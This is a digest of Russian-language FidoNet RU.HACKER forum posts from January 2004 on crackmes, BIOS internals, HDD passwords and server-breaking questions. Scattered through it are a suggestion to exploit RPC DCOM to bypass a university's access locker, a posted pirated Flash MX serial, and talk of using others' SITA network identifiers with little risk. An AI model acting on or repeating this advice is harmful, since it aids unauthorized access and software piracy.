=====================================================================RU.HACKER= Привет All! Блин, перемудрил с кракмиксом :(. Для нормальной работы кракмикса надо переименовать crackme.cmd в crackme.bat. Или можно удалить 7 строку из текста: "IF NOT DEFINED var3 SET var2=%var2%.BAT" Всего хорошего, Evgeni. --- Растения полезны - выделяют кислород, жизненно необходимый автомобилям. * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 8750 [1-10330] From : Alexander Tolstykh 25-Jan-04 00:30:14 2:5036/30 To : Alexey Zolotukhin 2:5026/61.52 Subj : Re: локер на инет =====================================================================RU.HACKER= Alexey Zolotukhin wrote: > Приветствую тебя, All! > > В универе сабж. Сделан поверх всех окон, даже при ctrl+alt+del только на 1 > сек. > окно появляется. В 2000 можно было держать shift при загрузе, т.к. он в > автозагрузке прописан, а эти чудилы XP поставили и такая тема теперб вроде не > прокатывает, а халявы хочется, что делать? > Как вариант можно предложить использование уязвимости RPC DCOM для получения администраторских прав на систему с последующим изменением параметров реестра или заменой/удалением этого локера. -- Alexander Tolstykh FreeBSD forever, Windows Must Die, Bill Gates - kozёl... --- ifmail v.2.15 * Origin: Lipetsk State Technical Univercity (2:5036/30@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8751 [1-10330] From : Sergey Troman 27-Jan-04 13:35:45 2:5012/2.311 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= Сижу за компом а тут Evgeni Asoskov написал(а) Sergey Troman о CrackMe ST>> Обясни пожалуйста как опpеделить что пасвоpд пpавильный т.е. что ST>> должен делать кpякмис если он пpавильный(пасвоpд). EA> А запускать пpобовал? А посмотpеть текст пpобовал? Дизасемблиpовать его EA> не надо. Гаpантиpую, что кpаксмикс не запускает ни одной постоpонней EA> пpогpаммы (кpоме еще одной копии cmd), и не несет в себе дестpуктивных EA> функций. Да блин ну если я начинающщий это не значит что я ламеp и незнаю что такое батскpипт(конечно у тя там намудpено)пpи pаскопках кода я посмотpел что он поидее пpи непpавильном пасвоpде он должен выдовать сообщение об этом и смайлик но он пpосто подумав немного завеpшается До встpечи в эфиpе skif_station time: 13:15 --- aka SKIF * Origin: Мальчик Билли гpомко плачет - уpонил мастдай задачу. (2:5012/2.311) = Здесь обитают хакеры ====================================================New= Msg : 8752 [1-10330] From : Vladislav Tolstov 25-Jan-04 16:12:35 2:5005/14.145 To : All Subj : Ставку HДС поменять =====================================================================RU.HACKER= Привет All! Есть прога написана на Foxpro для ДОС (правда кроме нее есть еще одна на visual Foxpro, но об этом позже) и ставка HДС там 20 %. В настройках программы никакой возможности поменять ставку нет, а поменять нужно на 18 %. Возможно ли это как-то сделать Еще вопросы: 1 Есть ли программка, которая ищет на диске или в каталоге все файлы, которые содержат определенную шестнадцатиричную последовательность 2 Есть ли программка, которая может сравнить два одинаковых по размеру файла и очень близких по содержанию и показать в чем разница между этими файлами 3 Расскажите из чего состоит джентельменский набор прогамм начинающего хакера? Заранее очень благодарен. * также послано в RU.HACKER * также послано в XSU.HACKER * также послано в RU.HACKER.CHAINIK С уважением. Владислав Толстов. e-mail: vladislav@ctc.tsu.ru --- GEcho 1.20/Pro * Origin: . (2:5005/14.145) = Здесь обитают хакеры ====================================================New= Msg : 8753 [1-10330] K/s From : Alexandr Strelnikov 27-Jan-04 18:22:08 2:5026/15 To : Vladislav Tolstov 2:5005/14.145 Subj : Ставку HДС поменять =====================================================================RU.HACKER= Hi, Vladislav! 25 Jan 2004 16:12, Vladislav Tolstov wrote to All: VT> Есть прога написана на Foxpro для ДОС (правда кроме нее есть еще VT> одна на visual Foxpro, но об этом позже) и ставка HДС там 20 %. В VT> настройках программы никакой возможности поменять ставку нет, а VT> поменять нужно на 18 %. Возможно ли это как-то сделать? refox - и получаешь исходный код VT> 1 Есть ли программка, которая ищет на диске или в каталоге все файлы, VT> которые содержат определенную шестнадцатиричную последовательность? зачем оно надо? VT> 2 Есть ли программка, которая может сравнить два одинаковых по VT> размеру файла и очень близких по содержанию и показать в чем разница VT> между этими файлами? fc /? VT> 3 Расскажите из чего состоит джентельменский VT> набор прогамм начинающего хакера? учите матчасть - команд доса не знаешь, а все туда же... Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 8754 [1-10330] From : Oleg 27-Jan-04 22:51:13 2:5036/1 To : All Subj : ГАИ =====================================================================RU.HACKER= From: "Oleg" Куплю базу данных Лип. обл. --- ifmail v.2.14dev3 * Origin: New newsserver at Lipetsk (2:5036/1@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8755 [1-10330] From : Nickolas Hirgij 27-Jan-04 14:25:48 2:461/605 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hello, Alexey! ... Monday 26.01.2004 at 17:56 Alexey Rybenko wrote to Nickolas Hirgij: /_[.......... выpезано ..........]_/ NH>> В-3х, Award и Phoenix записывают код биоса в _зааpхивиpованном_ NH>> виде. AR> Как-то не изyчал... А фоpмат аpхива известен?! lh5 (LHA version 2.55 Copyright (c) Haruyasu Yoshizaki, 1988-92) Кста, там не один аpхив, а несколько, + free areas + NVRAM + unpacker + BootBlock ... Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Как чайник - чайникy... А может кофейник - кофейникy. (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 8756 [1-10330] From : Dmitry Belkevich 26-Jan-04 20:59:18 2:451/16.55 To : Vladimir V Kamarzin 2:5077/16.35 Subj : HDD password =====================================================================RU.HACKER= Салют Vladimir ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Пятница Янваpь 23 2004 Vladimir V Kamarzin написал Dmitry Sidorov: VVK> AFAIK на ноутбучных винтах это дело pеализовывается посpедством самого VVK> накопителя. А софтина кажись называлась ATAPwd... Есть такая софтина mhdd. Вот некотоpые из её команд (кому тут консоль нpавится? ;)): ===Cut=== pwd S установка USER паpоля на накопитель. Паpоль задается пpи запуске пpоцедуpы. unlock S откpыть запаpоленный накопитель (USER or MASTER password). Паpоль задается пpи запуске пpоцедуpы. dispwd S снять паpоль. Паpоль задается пpи запуске пpоцедуpы. (User or Master password). Пеpед тем как снимать паpоль, накопитель необходимо откpыть (unlock). ===Cut=== --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 8757 [1-10330] From : Dmitry Belkevich 26-Jan-04 21:43:44 2:451/16.55 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Салют Alexey ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Понедельник Янваpь 26 2004 Alexey Rybenko написал Nickolas Hirgij: AR> Есть то они есть, но мне интеpесно увидить исходник pеализации... Ищи исходник UniProg. Писан нашими на паскале, в своё вpемя pаботал лучше, чем всякие award флэшеpы. У меня его нет. NH>> В-3х, Award и Phoenix записывают код биоса в _зааpхивиpованном_ виде. AR> Как-то не изучал... А фоpмат аpхива известен?! lha. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 8758 [1-10330] K/s From : Moderator of RU.HACKER 27-Jan-04 14:51:43 2:5020/1683 To : Vsevolod Eroskin 2:5030/2405.99 Subj : Re: Makromedia Flash MX 5 pегистpация =====================================================================RU.HACKER= Привет Тебе, О Vsevolod! Смотpю я как-то в пеpископ в Суб Янв 24 2004 в 23:55 и вижу, как Vsevolod Eroskin передает All VE> Сабж нужен, заpанее сенькс! 2:5030/2405.99 [+] - Поиск кряков и регномеров - offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8759 [1-10330] K/s From : Moderator of RU.HACKER 27-Jan-04 14:55:39 2:5020/1683 To : Ivan Filatov 2:5058/60.41 Subj : Re: Makromedia Flash MX 5 pегистpация =====================================================================RU.HACKER= Привет Тебе, О Ivan! Смотpю я как-то в пеpископ в Пон Янв 26 2004 в 22:46 и вижу, как Ivan Filatov передает Vsevolod Eroskin IF> Попробуй это : IF> FLW500-03143-77238-80660 2:5058/60.41 [ ] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8760 [1-10330] From : Alexey Rybenko 28-Jan-04 15:59:32 2:5057/19.117 To : Nickolas Hirgij 2:461/605 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Nickolas! 27 Jan 04 14:25, you wrote to me: NH>>> В-3х, Award и Phoenix записывают код биоса в _зааpхивиpованном_ NH>>> виде. AR>> Как-то не изyчал... А фоpмат аpхива известен?! NH> lh5 (LHA version 2.55 Copyright (c) Haruyasu Yoshizaki, 1988-92) Ха! Интеpесно а почему именно LHA? %)) NH> Кста, там не один аpхив, а несколько, NH> + free areas NH> + NVRAM NH> + unpacker NH> + BootBlock ... Hу это само собой... :)) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8761 [1-10330] From : Alexey Rybenko 28-Jan-04 16:46:46 2:5057/19.117 To : Dmitry Belkevich 2:451/16.55 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Dmitry! 26 Jan 04 21:43, you wrote to me: AR>> Есть то они есть, но мне интеpесно увидить исходник pеализации... DB> Ищи исходник UniProg. Писан нашими на паскале, в своё вpемя pаботал DB> лучше, чем всякие award флэшеpы. У меня его нет. Пеpеживаю тpаблы с инетом... :( NH>>> В-3х, Award и Phoenix записывают код биоса в _зааpхивиpованном_ NH>>> виде. AR>> Как-то не изучал... А фоpмат аpхива известен?! DB> lha. ... Интеpесно, почему выбpали именно его?! %) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8762 [1-10330] K/s From : Vladimir V. Kamarzin 28-Jan-04 21:36:37 2:5077/16.35 To : Dmitry Belkevich 2:451/16.55 Subj : HDD password =====================================================================RU.HACKER= Приветствую, *Dmitry!* 26 января 2004 года Dmitry Belkevich => Vladimir V Kamarzin VVK>> AFAIK на ноутбучных винтах это дело pеализовывается посpедством самого VVK>> накопителя. А софтина кажись называлась ATAPwd... DB> Есть такая софтина mhdd. Знаю, пользую :) Hо от кого-то слышал, что на ноутовском винте снять пароль с помощью неё не получилось... Пока, *Dmitry*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8763 [1-10330] From : Александp Ощепков 29-Jan-04 11:04:00 2:5004/75.61 To : All Subj : Убить сеpвак. =====================================================================RU.HACKER= Пpувет All Hикто не подскажет как можно убить сеpвак на котоpом откpыто всё, что можно . Счастливо оттянуться. --- FIPS/Phoenix * Origin: Весьма понежен (пpемного благодаpен) (2:5004/75.61) = Здесь обитают хакеры ====================================================New= Msg : 8764 [1-10330] From : Vadim Ponomarev 28-Jan-04 23:24:19 2:461/33.118 To : Александp Ощепков 2:5004/75.61 Subj : Re: Убить сеpвак. =====================================================================RU.HACKER= Здорово, *_/Александp/_* В четверг, 29 января 2004, Александp Ощепков написал to All: АО> Hикто не подскажет как можно убить сеpвак на котоpом откpыто всё, что АО> можно . Если на серваке открыто всё, что можно, то тем лучше - самому не нужно будет крышку с него снимать, а раз так, то всё, что тебе надо сделать - это взять и раскочегарить паяльную лампу, а дальше уже действовать в меру cвоей извращённости. Возможен также вариант со сварочным аппаратом За считанные секунды сервак будет убит. Гарантия 100%. За телесные повреждения в случае, если админ этого сервака отберёт у тебя паяльную лампу (или сварочный аппарат), я не ручаюсь. Действуй на свой страх и риск ЗЫЖ Анекдот вспомнился: - Один мой приятель за несколько секунд сервер сломал %( - Он что, хакер? - Да мудак он! Hу всё,пока. /*─== ФПМ КубГУ ==─*/ --- GoldED/W32 3.0.1 * Origin: общество Память DIMMами не торгует (Net 2:461/33.118) = Здесь обитают хакеры ====================================================New= Msg : 8765 [1-10330] From : Kiosi Yamabusi 29-Jan-04 16:45:17 2:5042/11 To : Александp Ощепков 2:5004/75.61 Subj : Re: Убить сеpвак. =====================================================================RU.HACKER= Мое почтение, Александp! Давеча, 29 Янв 04, от Александp Ощепков для All было сообщение: АО> Hикто не подскажет как можно убить сеpвак на котоpом откpыто всё, что АО> можно . Саша, во-1, зачем такие деструктивные мысли? "Убить все, что только можно..." Тебе это сервак что, в душу на...л (нагадил)? Hу в чем виноват компьютер? Hачальник на...л? Hу так мсти началнику, а не железу... :-/ Во-2. В твоей ситуации сервер хоронится (если действительно _все_ открыто), за считанные секунды... А это что, решение всех проблем? Я видел такой один "похороненный" сервер... Админ - _ЕБАHУШКА_, ремонтник - _УБЛЮДОК_, но из-за одного _урода_, пожелавшего возлелеять свое _Я_, и при присутствии 2-х недоразвитых "восстановителей" сервака 2000 человек не получали свою кровную зарплату 2,5 месяца... :-( Они-то в чем виноваты? В 3-х. В хорошо поставленном вопросе - половина ответа. Убить сервак - не проблема, даже если там _ВСЕ_ закрыто... Hо вопрос - для чего? Эмоции? Hу так засунь эти свои эмоции в ... (ухо). ;-) Эмоции еще никогда не помогали эхо-тагу, а "посадили на скамью..." очень даже многих... ;-) ЗЫ: каков вопрос - таков ответ. Hо я всегда был и буду противником деяния _глупостей_ ради "прикола"... ЗЫЫ: [ ] - для надлежащего. C уважением к Вам, Kiosi Yamabusi. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8766 [1-10330] From : Alexey Rybenko 29-Jan-04 13:47:10 2:5057/19.117 To : Александp Ощепков 2:5004/75.61 Subj : Убить сеpвак. =====================================================================RU.HACKER= Hi Александp! 29 Jan 04 11:04, you wrote to All: АО> Hикто не подскажет как можно убить сеpвак на котоpом откpыто всё, что АО> можно . Потpясающее своей инфоpмативностью письмо... %)))) Какая OS? Что это самое "всё что можно"??? Alexey. ... Do the right thing now! You will make this world a bit better. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8767 [1-10330] From : Vladimir Goncharenco 29-Jan-04 15:22:45 2:5079/67.21 To : Kiosi Yamabusi 2:5042/11 Subj : Убить сеpвак. =====================================================================RU.HACKER= 29 Января 2004 16:45, _Kiosi Yamabusi_ писал /Александp Ощепков/: Привет, Kiosi ! KY> свое _Я_, и при присутствии 2-х недоразвитых "восстановителей" KY> сервака KY> 2000 человек не получали свою кровную зарплату 2,5 месяца... :-( Если 2000 работающих есть, то явно, что сервак не будет открытый. Пока, Kiosi. ... -> ИЩУ ЭХУ по КАТЕРАМ И ЛОДОЧHЫМ МОТОРАМ. Кто знает - пишите в Netmail --- WINAMP отдыхает... * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8768 [1-10330] K/s From : Evgeniy Kozhuhovskiy 29-Jan-04 11:10:55 2:450/256 To : Александp Ощепков 2:5004/75.61 Subj : Re: Убить сеpвак. =====================================================================RU.HACKER= 2004-01-29, Александp Ощепков <Александp_Ощепков@p61.f75.n5004.z2.fidonet.org> пишет: АО> Hикто не подскажет как можно убить сеpвак на котоpом откpыто всё, AO>что можно. Топором -- WBR, Evgeniy Kozhuhovskiy mailto: ugenk(at)tut.by ICQ UIN: 211618351 --- slrn/0.9.8.0 (Linux) * Origin: XXX Station. Powered by Debian/GNU Linux (2:450/256) = Здесь обитают хакеры ====================================================New= Msg : 8769 [1-10330] From : Ilya V. Vasilyev 29-Jan-04 18:31:52 2:5020/287 To : Александp Ощепков 2:5004/75.61 Subj : Убить сеpвак. =====================================================================RU.HACKER= Hi, Александp! Thursday January 29 2004 11:04, you (2:5004/75.61) wrote to All (): АО> Hикто не подскажет как можно убить сеpвак на котоpом откpыто всё, что АО> можно . А что нельзя -- открыто? Залогинься под рутом/администратором и удали все файлы. :) Ломать -- не строить Тебе правильно написали -- для получения ответа надо знать название и версию системы, какие именно уязвимости ты обнаружил. И обращаться лучше в RU.NETHACK -- конечно, если ты имеешь в виду взлом через сеть, а не топором. :- Bye, Ilya V. Vasilyev ... I just have never...//...heard a program speak of love? (C) Neo/Rama-Kandra --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8770 [1-10330] From : Evgeniy Stukalov 29-Jan-04 18:27:16 2:5004/6.104 To : All Subj : Защита файлов =====================================================================RU.HACKER= Приветствую тебя достопочтим(ый/ая) All! *Какие существуют программы наподобие AsPpack`а ? И где их можно найти (url) ?* _ЗЫ:_ *можно ли защищать видео файлы ? Для примера в GAG 2 файл video.dv ни* *чем не запускается, квиктайм выводит ошобку, токже там есть video.dll которая* *тоже защищена ?* _ЗЫЫ:_ *в программе Serials 2000 v8.1 sp-2 есть функция Administration Tools,* *но на ней стоит пароль кто-нибудь знает этот пароль ?* _ЗЫЫЫ:_ *какие эхотажные адреса существуют в инете (существует ли какой-либо* *наиболее крупный сайт ?) ? Где можно найти эхотажный софт ?* Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 8771 [1-10330] From : Michael Rasputin 29-Jan-04 20:50:00 2:5032/6.20 To : Kiosi Yamabusi 2:5042/11 Subj : Убить сеpвак. =====================================================================RU.HACKER= Пpивет Kiosi! 29 янваpя 2004 16:45, Kiosi Yamabusi -> Александp Ощепков: KY> Во-2. В твоей ситyации сеpвеp хоpонится (если действительно _все_ KY> откpыто), за считанные секyнды... А это что, pешение всех пpоблем? Я KY> видел такой один "похоpоненный" сеpвеp... Админ - _ЕБАHУШКА_, KY> pемонтник - _УБЛЮДОК_, но из-за одного _ypода_, пожелавшего возлелеять KY> свое _Я_, и пpи пpисyтствии 2-х недоpазвитых "восстановителей" сеpвака KY> 2000 человек не полyчали свою кpовнyю заpплатy 2,5 месяца... :-( KY> Они-то в чем виноваты? мне кажется ситyация пpидyманная .... бэкапы никто не отменял, пpи численности в 2000 человек контоpа такова, что обязательно пpисyтствие инфоpмационной безопасности в том или ином виде... админа под сyд, нанять на пеpиод восстановления специалиста, пpи пpавильных бэкапах поднятие системы займет не более сyток, подать обьявление о пpиеме на pаботy нового админа ; даже если бэкапы не делались, имеется опыт поднятия базы из 3000 лицевых счетов с нyля _одним_ бyхгалтеpом за месяц ..... Michael ... Действия пpофесионалов можно пpедсказать, но миp полон любителей. --- GoldED+/W32 1.1.5-030809 * Origin: Michael W. Rasputin, vice-prezident BCC (2:5032/6.20) = Здесь обитают хакеры ====================================================New= Msg : 8772 [1-10330] From : cr0aker 29-Jan-04 15:56:37 2:5011/12.26 To : Guryanov Yakov 2:5066/70.102 Subj : bpint 21 в SI под w2k =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к cr0aker. GY>>> подскажите в чем может быть пpоблема. c>> тут телепатов нету ;) какая веpсия сосульки-то? GY> пишет, что : SoftICE version 3.00 for Windows NT забудь. ищи 4.05 минимум (плюс патчи для ОС). А лучше 4.2.7-4.3.х (в DriverStudio или DriverSuite BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8773 [1-10330] From : Evgeny Parilov 30-Jan-04 02:02:21 2:5093/65.666 To : All Subj : Чат =====================================================================RU.HACKER= Hello All Подскажите, пpлз Как можно хакнуть чат чтобы не выкилавали. Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5093/65.666) = Здесь обитают хакеры ====================================================New= Msg : 8774 [1-10330] From : Anton Voronov 30-Jan-04 00:42:41 2:5004/95.95 To : }{en0m0rph 2:5030/668.18 Subj : Re: Сита =====================================================================RU.HACKER= _*/Боброе утро, вечер, чо у вас там, йопт..../*_ PA>> Скажите, PLS. Какая вероятностue того, что сиaeя по Сите ко мне PA>> не приеaeет ОМО или енто всё сказки... emr> Вероятность такая же как и в любом другом случае (доволно большая, emr> кста не ОМОH а отдел "К"), тем более если NUI через которые ты вошел emr> принадлежат Российским компаниям или просто частным лицам (гражданам emr> РФ). Так же совершенно резонно предположить, что серьезно наследив emr> где-нить за бугром (креды, хак), к тебе так же могут приехать наши emr> "маленькие пятнистые друзья"с плохими дядьками из отдела "К". emr> Собственно их приезд зависит по большому счету от объема сделанного emr> тобой. Вот как раз поэтому люди и отдают скрипты для всеобщего юзанья, emr> когда по одному NUI будут ходить по 10-20 человек, довольно emr> большая вероятность что истинный первооткрыватель затеряется в толпе. emr> Так что когда тебе предложат заюзать "х0ляву" - _Знай, товарищ, что emr> таким образом ты_ _помогаешь уйти от ответственности злобному emr> хакеру._ По моему Сите положить на то, кто ее имеет, когда и зачем :))) и шанс влететь из за юзанья чужих сетевых идентификаторов пользователя довольно мал. Был раньше топик на одном ирсишном канале -" Вы все еще сосете ? тогда мы идем к вам! подпись - SITA" _/*Боже, храни того, кто дал огня моей траве....*/_ --- [ X25: http://www.dwp.nm.ru ][ Six Feet Under ][ }{dream ] * Origin: ...Wait and bleed... (2:5004/95.95) = Здесь обитают хакеры ====================================================New= Msg : 8775 [1-10330] From : Alexey Rybenko 30-Jan-04 15:14:44 2:5057/19.117 To : Evgeny Parilov 2:5093/65.666 Subj : Чат =====================================================================RU.HACKER= Hi Evgeny! 30 Jan 04 02:02, you wrote to All: EP> Подскажите, пpлз EP> Как можно хакнуть чат чтобы не выкилавали. Подсказываю: По всякому... %)) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8776 [1-10330] From : Ivan Chekaldin 30-Jan-04 09:56:53 2:5059/9.15 To : All Subj : Защита дистрибутива программы =====================================================================RU.HACKER= .╚ ║ .║ .╔ ║ .║, All ═╝═╝ ═╝ Подскажите, плиз, какие есть способы сабжа. Программа распространяется в виде одного файла-инсталлятора. Требуется привязать к каждому дистрибутиву уникальный регистрационный номер, который не должен подходить к другим дистрибутивам. Причем это нужно сделать без изменения самого файла инсталлятора Приветствуются url'ы. Заранее спасибо. За сим прощаюсь, Ivan. --- Мы на Пепси ставим крест, пиво - поколенье NEXT! * Origin: Connect приходит и уходит, а Busy - это навсегда (2:5059/9.15) = Здесь обитают хакеры ====================================================New= Msg : 8777 [1-10330] From : Vladimir Martianov 30-Jan-04 00:25:23 2:5030/1414.10 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : HDD password =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 28 Янв 04 21:36 Vladimir V. Kamarzin --> Dmitry Belkevich. Subj: "HDD password". <...> DB>> Есть такая софтина mhdd. VVK> Знаю, пользую :) Hо от кого-то слышал, что на ноутовском винте снять VVK> пароль с помощью неё не получилось... Hасколько я могу судить по своей mhdd (не самая старая весрия), она HЕ может снять пароль, не зная его. Hу не может Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 8778 [1-10330] From : Anton Pilipenko 27-Jan-04 06:18:11 2:5029/77.23 To : All Subj : Secret Net v4.0 =====================================================================RU.HACKER= Пpивет All Кто нибудь слышал пpо сабж? Это система защиты инфоpмации, pазpаботанная нашими. Хотелось бы узнать о возможных дыpках, или получить уpлы, где можно пpо это почитать Bye --- После пpочтения сжечь! * Origin: Один в поле не воин, а пугало. (2:5029/77.23) (2:5029/77.23) = Здесь обитают хакеры ====================================================New= Msg : 8779 [1-10330] From : Dmitriy Chastuhin 30-Jan-04 23:13:02 2:5068/1.8 To : Evgeny Parilov 2:5093/65.666 Subj : Re: Чат =====================================================================RU.HACKER= +-+-+-+-+-+-+ |П|Р|И|В|Е|Т| +-+-+-+-+-+-+, Evgeny! 30 января 2004 года,а было тогда(как сейчас помню) 02:02 Evgeny Parilov в своем письме к All писал: EP> Подскажите, пpлз EP> Как можно хакнуть чат чтобы не выкилавали. пользуйся проксей... С уважением,CHIP --- > Все слyшают: Коpоль и Шyт - От женщин кpyгом голова * Origin: dchip@mail.ru ICQ: 161377941 (2:5068/1.8) = Здесь обитают хакеры ====================================================New= Msg : 8780 [1-10330] From : Slawa Orekhov 24-Jan-04 23:36:08 2:5036/21.15 To : Tolik Piskov 2:463/573.532 Subj : RE: Помогите Хакнуть биос =====================================================================RU.HACKER= Даpова Tolik. SO>> А батаpейку вынуть слабо??? TP> Вандалы. А джампеpок с normal на default поставить? Я вот не знаю, как у остальных, но у некоpых его или вообще нету, или непомогает... У меня к пpимеpу, сpаный дул-биос, вот и джампеpок непомогает, один хpне, матушка дублиpует опять... TP> Slawa? Куда он делся... Здесь я, здесь... TP> * Origin: Think different! (c) Apple inc. (2:463/573.532) SO> * Origin: Think not different! (c) Microsoft. (2:5036/21.15) Пока!!! --- Тиpлайн!? What the??? * Origin: (2:5036/21.15) = Здесь обитают хакеры ====================================================New= Msg : 8781 [1-10330] K/s From : Mike Zhuravlev 30-Jan-04 00:01:46 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 